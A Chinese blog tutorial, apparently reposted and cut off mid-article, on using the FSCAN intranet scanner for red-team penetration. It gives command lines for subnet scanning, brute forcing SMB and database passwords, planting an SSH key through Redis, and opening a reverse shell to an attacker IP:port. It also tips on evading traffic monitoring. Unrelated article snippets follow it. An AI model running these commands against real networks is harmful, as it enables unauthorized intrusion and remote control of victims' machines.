fscan渗透使用指南只为学习

article/2025/7/4 1:49:02

📢【红队必备】FSCAN保姆级使用指南:从入门到实战,内网渗透一键通关!


一、工具简介

FSCAN是一款国产开源的内网综合扫描工具,集资产探测、漏洞扫描、权限获取于一体,被红队誉为“内网渗透瑞士军刀”。支持Windows/Linux系统,2025年发布的2.0.0版本新增代理隐匿、多网卡识别等功能,扫描效率提升30%。


二、核心功能速览

  1. 网络探测

    • 主机存活检测fscan.exe -h 192.168.1.1/24 -m icmp(快速定位C段存活主机)。

    • 端口扫描:支持21种常见端口,可自定义范围,如-p 80,443,8080

  2. 漏洞利用

    • 高危漏洞检测:MS17-010永恒之蓝、WebLogic反序列化等一键扫描。

    • 数据库爆破:MySQL/MSSQL/Redis等弱口令破解,如-userf users.txt -pwdf pass.txt

  3. 权限获取

    • Redis写公钥-rf id_rsa.pub直接获取SSH权限。

    • 计划任务反弹Shell-rs 攻击机IP:端口实现隐蔽控制。


三、保姆级使用教程

1. 安装与基础扫描

  • 下载地址:GitHub Releases页获取最新版(含Windows/Linux版本)。

  • 基础命令

    # 扫描C段资产(存活探测+端口扫描+漏洞检测)
    fscan.exe -h 192.168.1.1/24 -o result.txt
    

2. 进阶场景

  • 场景1:精准打击漏洞

    # 针对SMB服务批量爆破弱口令
    fscan.exe -h 10.0.0.0/16 -m smb -pwd Admin@123
    
  • 场景2:隐匿渗透

    # 通过代理隐藏流量(如配合CobaltStrike)
    fscan.exe -h 目标IP -socks5 127.0.0.1:1080
    

3. 参数避坑指南

参数用途说明典型错误案例
-t 600控制线程数(默认600)-t 1000可能触发流量监控封IP
-nopoc跳过Web漏洞检测误用可能漏掉Struts2漏洞
-silent静默模式(减少日志输出)非隐匿环境下使用普通模式易暴露

四、实战技巧与防御建议

1. 漏洞利用案例

  • **Redis写公钥…


http://www.hkcw.cn/article/DTwxQclIeK.shtml

相关文章

IDEA 在公司内网配置gitlab

赋值项目链接 HTTPS 将HTTP的链接 ip地址换成 内网地址 例如:https:172.16.100.18/...... 如果出现需要需要Token验证的情况: 参考:Idea2024中拉取代码时GitLab提示输入token的问题_gitlab token-CSDN博客

Keil MDK5.37或更高版本不再预装ARM Compiler Version5导致编译错误的解决方法

Keil MDK5.37预装的是最新的ARM Compiler Version6 我们可以先右击查看工程属性 在Target标签下,我们可以看到Compiler Version5就是丢失的 在Target标签下,我们可以看到Compiler Version5就是丢失的 图1 以固件库方式编程,编译之后全是错…

Pix4d航测软件正射影像生产流程(二)控制点刺点及高精度空三解算

1.控制点刺点,控制点数据导入。 2.根据空三控制点数据刺点。

如何利用实时足球数据搭建AI预测模型:技术解析与应用前景

在当今数据驱动的体育时代,足球数据分析已经从简单的赛后统计发展为能够实时影响比赛决策的强大工具。本文将为您解析如何利用实时足球数据搭建AI预测模型,以及这项技术如何改变我们对足球比赛的理解和预测能力。 一、实时足球数据的获取与处理 搭建AI模…

美银行:新兴市场股市迎最大资金流入;全球股市“失血”

本周,全球股市继续遭遇资金流出,而黄金和债券成为投资者的避风港。美银策略师Michael Hartnett报告指出,截至5月底,全球股市在过去一周录得年内最大单周净流出资金,金额高达95亿美元,其中新兴市场股票则出现20亿美元的年内最大净流入。同一时期,美元指数持续走弱,年内跌…

清华谈高中生登顶珠峰获保送 并非招生计划

近日,有媒体报道称北京第八十中学17岁的学生李浩榕成为中国首位从北坡登顶珠峰的青少年,消息一度登上热搜。还有报道称他是“全球中学生第一人”。不过,根据国内媒体的报道,河北16岁女孩丁禹琪曾在2020年从北坡成功登顶珠峰。西藏登山协会在5月30日证实,在中国业余登山爱好…

美国政府终止一项艾滋病疫苗研发项目

总台记者当地时间5月30日获悉,特朗普政府终止了一项2.58亿美元的项目,对艾滋病疫苗研发工作造成了沉重打击。一位不愿透露姓名且未经授权发言的高级官员表示,美国国立卫生研究院计划将关注点转向利用现有方法消除艾滋病。与此同时,该研究院也暂停了莫德纳公司研发的一项艾滋…

刘宇宁全开麦彩排现场 江湖嗓音带感十足

刘宇宁彩排是把CD都搬来了,咱就说这全开麦无修音现场真的很带感,谁能不夸一句宁哥的江湖嗓音呢~摩登兄弟刘宇宁责任编辑:zx0001

当地谈瓜农10万斤西瓜烂地里 滞销致价格骤降

5月29日,广西扶绥县的瓜农因西瓜滞销和收购价低而将西瓜扔进池塘或任其烂在地里。山圩镇一名瓜农表示,今年西瓜收购价只有每斤两毛钱,远低于往年,他预计会亏损四五万元,地里有10万斤西瓜被丢弃。另一位瓜农黄先生说,种一亩西瓜需要投资1500元,但卖出去只能收入五六百元。…

美国比特币ETF受热捧 资金大迁移涌入比特币

一场资金大迁移正在华尔街上演,投资者开始抛弃传统避险资产黄金,转而涌入比特币。根据彭博汇编的数据,在过去五周内,美国的比特币ETF吸引了超过90亿美元的资金流入,其中贝莱德旗下的iShares Bitcoin Trust ETF流入规模最大。与此同时,黄金ETF在同一时期遭遇了超过28亿美元…

成都4000架无人机演绎人类进化史 文明兴衰的星空叙事

昨日晚间,成都一场活动中,4000架无人机通过“星空叙事体”展示了人口大国的兴衰。这一创意灵感来源于携程集团联合创始人梁建章在其书中提出的观点,即人口流动对国家和文明兴衰的影响。梁建章希望通过这次表演传达人类进化史和文明史是一场知识和基因的接力赛,强调了传承与…

莱巴金娜跻身法网16强将战斯瓦泰克 红土七连胜士气高昂

5月30日,在法网女单第三轮比赛中,12号种子莱巴金娜以2-0(6-2、6-2)击败21号种子奥斯塔彭科,取得对后者的四连胜,并第三次晋级法网16强。目前,莱巴金娜在红土赛场上保持七连胜。接下来,莱巴金娜将迎战卫冕冠军斯瓦泰克,两人交手战绩为4-4平。在今年的联合杯和多哈站比赛…

ISOLAR软件生成报错处理(七)

错误1 Description Resource Path Location Type Target ARObject: <xxxx> Element xxxx has a duplicate name within context /xxxx/SwComponentTypes/xxxx but is not defined by AUTOSAR as splittable. Splittable elements and packages with the same name are m…

RCU stall 异常卡住问题

加载驱动 RCU现场 Rcu stall 时无法触发Kdump

Linux研学-环境搭建

一 概述 1 Linux 概述 Linux系统由内核、Shell、文件系统、应用程序及系统库等关键部分组成。内核作为核心&#xff0c;管理硬件资源与系统服务&#xff1b;Shell提供用户与系统交互的命令行界面&#xff0c;让用户能便捷执行操作&#xff1b;文件系统负责数据的存储、组织与管…

【办公类-18-07】20250527屈光检查PDF文件拆分成多个pdf(两页一份,用幼儿班级姓名命名文件)

背景需求&#xff1a; 今天春游&#xff0c;上海海昌公园。路上保健老师收到前几天幼儿的屈光视力检查单PDF。 她说&#xff1a;所有孩子的通知都做在一个PDF里&#xff0c;我没法单独发给班主任。你有什么办法拆开来&#xff1f; 我说&#xff1a;“没问题&#xff0c;问deep…

yolov8添加注意力机制

在 YOLOv8 中添加注意力机制可以显著提升模型对关键特征的关注能力&#xff0c;从而提高检测精度。以下是几种主流注意力机制的实现方法和集成策略&#xff1a; 1. 注意力机制选择 根据计算效率和效果&#xff0c;推荐以下几种注意力模块&#xff1a; CBAM&#xff1a;同时关…

SpringBatch+Mysql+hanlp简版智能搜索

资源条件有限&#xff0c;需要支持智搜的数据量也不大&#xff0c;上es搜索有点大材小用了&#xff0c;只好写个简版mysql的智搜&#xff0c;处理全文搜素&#xff0c;支持拼音搜索&#xff0c;中文分词&#xff0c;自定义分词断词&#xff0c;地图范围搜索&#xff0c;周边搜索…

林峯堂妹回应破产传闻 豪门生活背后的真相

谁能想到,前几天还拎着爱马仕、坐着商务舱看演唱会的TVB视后林夏薇,突然就被申请破产了?这剧情反转得比港剧还刺激。根据法院文件,一家公司向香港高院申请她破产,案子8月才开庭。最让人震惊的是,她家住山顶15亿豪宅,老公还是金融才俊,怎么突然就沦落到这步?就在破产消…

摩根大通CEO:美最大威胁是内部敌人 警惕自我挑战

摩根大通首席执行官杰米戴蒙在加州的一场经济论坛上表示,美国真正应该担心的不是中国,而是自己。他认为美国应警惕“内部的敌人”。尽管他承认中国是一个潜在对手,但指出中国在许多方面做得很好。他质疑美国能否在行动、价值观、能力和管理方面齐心协力。戴蒙还警告称中美间…